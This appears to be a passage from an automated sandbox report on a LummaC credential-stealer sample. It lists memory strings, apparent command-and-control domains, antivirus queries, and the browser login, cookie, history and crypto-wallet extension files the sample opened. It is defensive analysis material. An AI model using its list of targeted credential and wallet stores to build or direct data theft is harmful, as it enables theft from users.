                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: ji2xlo1f.exe, 00000001.00000002.2584910256.000000000162E000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000002.2584910256.0000000001695000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242782782.0000000001695000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2571620686.0000000001694000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: ji2xlo1f.exe, 00000001.00000003.2368973258.0000000003D6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\ji2xlo1f.exeProcess information queried: ProcessInformationJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: moutheventushz.shop
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: respectabosiz.shop
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: bakedstusteeb.shop
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: conceszustyb.shop
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: nightybinybz.shop
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: standartedby.shop
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: mutterissuen.shop
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: worddosofrm.shop
                Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: terracedjz.cyou
                Source: C:\Users\user\Desktop\ji2xlo1f.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: ji2xlo1f.exe, 00000001.00000003.2491396441.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2490993370.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\ji2xlo1f.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: ji2xlo1f.exe PID: 4176, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: ji2xlo1f.exeString found in binary or memory: %appdata%\Electrum\wallets
                Source: ji2xlo1f.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: ji2xlo1f.exeString found in binary or memory: Jaxx Liberty
                Source: ji2xlo1f.exe, 00000001.00000003.2458550592.000000000169A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: ji2xlo1f.exe, 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: ji2xlo1f.exeString found in binary or memory: ExodusWeb3
                Source: ji2xlo1f.exe, 00000001.00000003.2458550592.000000000169A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
